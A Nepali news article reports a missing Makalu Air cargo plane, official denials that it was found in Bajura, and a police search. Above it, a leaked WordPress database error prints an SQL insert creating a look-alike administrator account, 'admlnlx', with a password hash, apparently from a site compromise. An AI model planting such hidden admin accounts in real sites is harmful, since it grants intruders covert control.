WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bbma1m8D5.88q3/zEnEtK6N4SHDJtr.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 03:05:54', '', 'admlnlx', 'admlnlx')
काठमाडौं । सुर्खेतबाट उडेर बेपत्ता भएको मकालु एयरको जहाज बाजुरामा भेटिएको भन्ने खबर त्रिभुवन विमानस्थलका महाप्रबन्धक राजकुमार क्षेत्रीले खण्डन गरेका छन् । क्षत्रीले भने, ‘विमान भेटिएको अपुष्ट खबर मात्र आएको हो । विमान अझै पनि राडारको सम्पर्कमा आएको छैन ।’
यसअघि जहाजले बाजुराको एक बगरमा आपतकालीन ल्यान्ड गरेको खबर बाहिर आएको थियो । कार्गो सामान लिएर जहाज सुर्खेतबाट ६ बजेर १२ मिनेटमा सिमिकोटका लागि उडेको थियो ।
९ एन एजेयु कल साइनको जहाजमा चालक दलका दुई सदस्य मात्रै थिए । यता, बाजुराका डिएस्पी कविन्द्र सिंह बोहोराले पनि एक स्थानीय पत्रकारले विमान बाजुराको बगरमा भेटिएको जानकारी दिएपछि खोजीका लागि प्रहरी परिचालन गरिएको जानकारी दिए ।
‘विमानले आकस्मिक अवतरण गरेको भन्ने खबर पाएका छौँ । तर, हामीले अहिलेसम्म आँखाले विमान देखेका छैनौँ,’ बोहोराले भने ।
उनका अनुसार बाजुरमा दुईवटा बगर रहेको छ, एउटा कर्णालीको बगर र बाजुराको बगर । बाजुराको वगर विक्षा चौकीबाट २ घण्टा टाढा रहेको र त्यहाँबाट प्रहरी हिनिसकेको उनले जानकारी दिए ।
कर्णालीको बगरका लागि प्रहरी पठाइसकेको उनले जानकारी दिए । यसअघि, सन् २०१६ मा पनि मकालु एयरको विमान हुम्लाको सिमिकोट विमानस्थलमा दुर्घटनामा परेको थियो । उक्त दुर्घटनामा दुई जना घाइते भएका थिए ।